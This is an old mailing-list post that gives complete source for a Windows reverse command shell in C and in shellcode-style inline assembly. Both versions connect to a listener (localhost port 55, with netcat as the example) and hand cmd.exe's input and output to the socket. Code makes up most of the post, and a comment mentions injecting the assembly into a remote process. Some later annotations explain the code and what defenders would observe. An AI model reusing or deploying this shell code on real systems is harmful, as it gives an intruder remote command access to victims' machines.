Windows reverse Shell #2
From: NetNinja (netninja@hotmail.kg)
Date: 02/07/03
Date: Fri, 7 Feb 2003 18:44:53 +0600 From: NetNinja <netninja@hotmail.kg> To: vuln-dev@securityfocus.com
Hello folks,
Thnx everyone for ur replies.
Today i found time to have a careful look at my reverse shell C source
code. The problem that i had was very simple. In my C source i forgot to
initialize STARTUPINFO struct to zero. That was the problem. 3APA3A's
code did initialize that struct, so big thnx to him. Another thing
u have to do is to cast socket handle returned from WSASocket call to
ptr type and pass it on to stdInput,stdOutput and stdErr of
STARTUPINFO struct.
That's it!
If anyone is interested in reverse cmd shell for windows i have
included both C and inline asm version. so have a look at them.
---- C ---------------
/*
reverse cmd shell
Will spit back command shell on ur listening netcat
on ur localhost (127.0.0.2) port 55
set up ur netcat eg. nc -l -p 55 -vv
A*** (netninja@hotmail.kg)
http://netninja.to.kg
*/
#include <winsock2.h>
#include <stdio.h>
#pragma comment(lib,"ws2_32")
/*
 * Entry point of the posted C version.  Kept exactly as posted: 'void main'
 * is non-standard and 'true' is a C++ keyword, so this builds as C++ on MSVC.
 * No return value is checked anywhere below, so a failed connect() still
 * reaches CreateProcess with an unconnected socket as the child's std handles.
 *
 * Observable shape (what a defender sees): an outbound TCP connect from this
 * process, immediately followed by a child cmd.exe whose stdin/stdout/stderr
 * are all the same socket handle.
 */
void main(int argc, char *argv[])
{
WSADATA wsaData;
SOCKET hSocket;
STARTUPINFO si;                       // must be zero-initialized first (the bug the mail above describes)
PROCESS_INFORMATION pi;
struct sockaddr_in adik_sin;
memset(&adik_sin,0,sizeof(adik_sin));
memset(&si,0,sizeof(si));             // the fix from the mail: zero STARTUPINFO before filling in fields
WSAStartup(MAKEWORD(2,0),&wsaData);
hSocket = WSASocket(AF_INET,SOCK_STREAM,NULL,NULL,NULL,NULL);
adik_sin.sin_family = AF_INET;
adik_sin.sin_port = htons(55);        // port 55, matching the header comment
adik_sin.sin_addr.s_addr = inet_addr("127.0.0.1"); // note: the header comment says 127.0.0.2, the code uses 127.0.0.1
connect(hSocket,(struct sockaddr*)&adik_sin,sizeof(adik_sin));
si.cb = sizeof(si);
si.dwFlags = STARTF_USESTDHANDLES;    // child takes its std handles from the three fields below instead of the console
si.hStdInput = si.hStdOutput = si.hStdError = (void *)hSocket; // socket handle cast to a HANDLE, as the mail describes
CreateProcess(NULL,"cmd",NULL,NULL,true,NULL,NULL,NULL,&si,&pi); // bInheritHandles=true so cmd.exe can use the inherited socket
ExitProcess(0);                       // parent exits; the child cmd.exe keeps the socket
}
------[ end C ]--------------
----[ inline ASM ]------
/*
reverse cmd shell
inline asm version
reverse cmd shell on address 127.0.0.1 port 55
A*** (netninja@hotmail.kg)
http://netninja.to.kg
*/
#include <winsock2.h>
#include <stdio.h>
#pragma comment(lib,"ws2_32")
#define GP 0x77E7B332 // hardcoded address of GetProcAddress (see 'call eax //GetProcAddress' below); only valid for the author's kernel32.dll build, differs between Windows versions and is defeated by ASLR on later systems
#define LL 0x77E7D961 // hardcoded address of LoadLibraryA, same caveat as GP
#define CreateProcessA [ebp-8]   // slots in the __asm frame that the loader loop fills with resolved API pointers, 4 bytes apart, in name-table order
#define ExitProcess [ebp-0ch]
#define WSASocketA [ebp-10h]
#define connect [ebp-14h]        // NOTE: these macros shadow the real API names for the rest of this file; the #includes above are parsed before them
#define CMD_STR [ebp-18h]        // pointer to the "cmd" string inside ptr[]
#define PORT 0x3700 //(htons(55)) here u gotta reverse byte order 0x0037=3700
#define IPADDR 0x0100007F // 7F000001//(inet_addr("127.0.0.1"))
/*
 * Inline-asm variant of the same program.  Register roles inside the __asm
 * block: edi walks the name table in ptr[]; ebp is re-based to a private
 * 0x20-byte frame whose slots hold the current library handle ([ebp-4]), the
 * resolved API pointers ([ebp-8]..[ebp-14h], see the #defines above) and the
 * "cmd" pointer ([ebp-18h]); ebx holds the socket handle once created.
 * The block never returns - it ends in ExitProcess, so the frame is never
 * torn down and main's own frame is never restored.
 *
 * Observable shape is identical to the C version: outbound TCP connect, then
 * a child cmd.exe whose three std handles are the socket.
 */
void main(int argc, char *argv[])
{
// name table: <lib>\0<func>\0...\0 per library, a second NUL ends that
// library's function list, a third NUL ends the library list, then "cmd"
char ptr[] = "kernel32\0CreateProcessA\0ExitProcess\0\0"
"ws2_32\0WSASocketA\0connect\0\0\0cmd\0\0\0";
char *i=ptr;
WSADATA wsaData;
WSAStartup(MAKEWORD(2,0),&wsaData); //initialize winsock, this is not done below
// usually when u inject ur shellcode into remote process
// socket is already initialized
__asm
{
mov edi, i                           // edi = start of the name table
dec edi                              // pre-decrement so load_lib's 'inc edi' lands on the first byte
push ebp
mov ebp,esp                          // private frame, layout described in the header comment
sub esp,0x20
mov ecx,ebp
sub ecx,4h
push ecx                             // "next slot" pointer; load_func pops it, moves it down 4 and pushes it back
load_lib:
inc edi
cmp byte ptr[edi],0                  // empty name here = end of the library list
je done_loadin
push edi
mov eax, LL
call eax //LoadLibrary("Lib")
mov [ebp-4],eax //places lib handle into ebp-4
xor eax,eax
repne scasb                          // advance edi past the name's NUL; ecx still holds the slot address computed above, so the scan is bounded only by the NUL
load_func:
cmp byte ptr[edi],0                  // second NUL = end of this library's function list
je load_lib
push edi
mov ebx, dword ptr[ebp-4] //lib handle
push ebx
mov eax, GP
call eax //GetProcAddress("Function")
pop ecx                              // slot pointer saved above
sub ecx,4                            // next slot down: [ebp-8], [ebp-0ch], [ebp-10h], [ebp-14h] in table order
mov dword ptr[ecx], eax
push ecx
xor eax,eax
repne scasb
jmp load_func
done_loadin:
xor eax,eax
inc edi                              // past the third NUL: edi now points at "cmd"
mov dword ptr[ebp-18h],edi
mov ecx,50 //make some space for structs
push_em:
push eax                             // 50 x 4 = 200 zero bytes; the structs below are carved out of this region and its top doubles as the last four (zero) WSASocketA arguments
loop push_em
push 0x1                             // type = SOCK_STREAM
push 0x2                             // af = AF_INET
call WSASocketA                      // WSASocketA(AF_INET, SOCK_STREAM, 0, NULL, 0, 0) - same call as the C version
mov ebx, eax //copies sockethandle returned into ebx
//ebp-20h
mov dword ptr[ebp-40h],0x2 //sockaddr_in: sin_family = AF_INET
mov word ptr[ebp-3Eh],PORT           // sin_port, already in network byte order
mov dword ptr[ebp-3Ch],IPADDR        // sin_addr = 127.0.0.1
//mov dword ptr[ebp-40h],process_information
mov dword ptr[ebp-94h],0x44 //sizeof startupinfo (STARTUPINFO.cb at offset 0)
mov dword ptr[ebp-68h],0x100 //dwFlags = STARTF_USESTDHANDLES (offset 2Ch)
mov dword ptr[ebp-5Ch],ebx //stdin  (hStdInput,  offset 38h)
mov dword ptr[ebp-58h],ebx //stdout (hStdOutput, offset 3Ch)
mov dword ptr[ebp-54h],ebx //stderr (hStdError,  offset 40h)
push 0x10 //sizeof sockaddr_in
lea edx, dword ptr[ebp-40h]
push edx //ptr to sockaddr_in
push ebx //socket handle
call connect                         // connect(s, &sockaddr_in, 16); result is not checked
lea edx,dword ptr[ebp-50h]
push edx //push proc_info (PROCESS_INFORMATION, 10h bytes, directly below sockaddr_in)
lea edx,dword ptr[ebp-94h]
push edx //push ptr to startupinfo
xor edx,edx                          // remaining CreateProcessA args, pushed right-to-left
push edx                             // lpCurrentDirectory
push edx                             // lpEnvironment
push edx                             // dwCreationFlags
inc edx //inheritHandles = true
push edx                             // bInheritHandles
dec edx
push edx                             // lpThreadAttributes
push edx                             // lpProcessAttributes
mov eax,CMD_STR //ptr to "cmd" str
push eax                             // lpCommandLine
push edx                             // lpApplicationName
call CreateProcessA                  // child cmd.exe with all three std handles = the socket
push edx
call ExitProcess                     // ExitProcess(0); never returns, frame never popped
}
}
----[ end ]------
-- Best regards, A*** (NetNinja) mailto:netninja@hotmail.kg